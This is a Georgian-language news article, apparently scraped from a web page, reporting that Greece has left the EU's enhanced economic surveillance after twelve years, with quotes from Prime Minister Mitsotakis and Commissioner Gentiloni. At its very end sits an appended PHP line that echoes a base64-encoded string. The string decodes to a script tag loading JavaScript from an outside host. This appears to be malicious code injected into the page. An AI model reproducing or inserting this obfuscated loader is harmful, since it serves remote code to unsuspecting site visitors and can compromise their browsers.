celsiusi
ავერსი შნაიდერი
საბერძნეთი, 12 წლის შემდეგ, ევროკავშირის გაძლიერებული ეკონომიკური ზედამხედველობის სისტემიდან გამოვიდა. ინფორმაციას გერმანული გამოცემა „დოიჩე ველე” ავრცელებს.
 
„ეს არის ისტორიული დღე საბერძნეთისთვის და ყველა ბერძენისთვის“, – განაცხადა საბერძნეთის პრემიერ-მინისტრმა, კირიაკოს მიცოტაკისმა.
 
პრემიერმა ხაზგასმით აღნიშნა, რომ ევროკავშირის ზედამხედველობის გარეშეც, შეცდომები, რომლებმაც საბერძნეთში ბოლო წლებში მძიმე ფინანსური კრიზისი გამოიწვია, არავითარ შემთხვევაში არ უნდა განმეორდეს.
 
მისი თქმით, ერთის მხრივ, იქნება ხელფასების ზრდა და გადასახადების შემცირება, მეორეს მხრივ, კი ამან არ უნდა შეაფერხოს ფინანსური სტაბილურობის შენარჩუნების მცდელობები.
 
ევროკავშირის გაძლიერებული ზედამხედველობიდან საბერძნეთის გამოსვლას მიესალმა ევროკომისარი ეკონომიკის საკითხებში პაოლო ჯენტილონიც. მისი თქმით, საბერძნეთი დღეს ხურავს რთულ თავს მის ხანგრძლივ და დიდებულ ისტორიაში.
 
როგორც მედია წერს, საბერძნეთში ეკონომიკური კრიზისი 2009 წელს დაიწყო. ქვეყანა საგარეო ვალთან დაკავშირებული კრიზისის გამო და კრედიტორების ზეწოლის ქვეშ იძულებული გახდა, დაენერგა მკაცრი ზომები. ამ პერიოდში ბერძნებმა შემოსავლის დაახლოებით 25 პროცენტი დაკარგეს.
728
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");